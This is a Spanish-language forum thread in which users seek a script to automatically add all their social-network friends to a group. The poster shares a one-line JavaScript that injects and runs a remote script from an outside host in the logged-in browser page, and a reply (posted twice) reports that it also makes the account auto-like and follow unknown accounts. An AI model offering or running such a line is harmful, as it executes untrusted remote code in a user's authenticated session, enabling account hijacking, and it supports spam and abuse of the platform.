¿Cómo agregar a todos tus contactos a un grupo de manera automática?

• Autor Autor rounder
  • Fecha de inicio Fecha de inicio
rounder

rounder

Pi
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Buenas, tenia un codigo para hacer esto, pero parece ser que ya no me esta funcionando, alguien lo tiene, es el codigo que usan las paginas donde te engañan diciendo que vas a conseguir miles de suscriptores, o en su defecto alguien que me pueda dar un metodo para agregar a todos mis amigos a un grupo

bueno ya encontre uno que sirve para firefox aca lo dejo:

document.body.appendChild(document.createElement('script')).src='http://jigs-creations.webs.com/auto-group-adder.js';

Última edición:
Antes que nada, gracias por el aporte.

Funciona bien con dos salvedades:

1.- Después de agregar cierto numero de usuarios me toco que una cuenta con 3 mil amigos, al llevar como 1,100 agregados y faltando 1,500 por checar comenzó a mandar un mensaje que que se necesita una autorización para poder agregar mas usuarios y asi se va .... recorre hasta el ultimo amigo pero ya no agrega mas de ningún grupo.

Quise agregar usuarios manualmente desde la misma cuenta que ya no me permitió con el script, y me da el mismo mensaje. Espere 24 horas y volví a correr el script y sigue igual. Tal vez haya que esperar mas o no se a que autorización se refiera.

y 2.- Que te hace autolike y empiezas a seguir automaticamente algunas cuentas que de alguna forma ganan tu like al correr el script.

Pero de ahi en mas, si funciona. Habra otro script que funcione acutalemente para grupos ?

saludos

Antes que nada, gracias por el aporte.

Funciona bien con dos salvedades:

1.- Después de agregar cierto numero de usuarios me toco que una cuenta con 3 mil amigos, al llevar como 1,100 agregados y faltando 1,500 por checar comenzó a mandar un mensaje que que se necesita una autorización para poder agregar mas usuarios y asi se va .... recorre hasta el ultimo amigo pero ya no agrega mas de ningún grupo.

Quise agregar usuarios manualmente desde la misma cuenta que ya no me permitió con el script, y me da el mismo mensaje. Espere 24 horas y volví a correr el script y sigue igual. Tal vez haya que esperar mas o no se a que autorización se refiera.

y 2.- Que te hace autolike y empiezas a seguir automaticamente algunas cuentas que de alguna forma ganan tu like al correr el script.

Pero de ahi en mas, si funciona. Habra otro script que funcione acutalemente para grupos ?

saludos

sigo buscandolo :S ya hice un tema en BHW para ampliar mis horizontes de busqueda

Atrás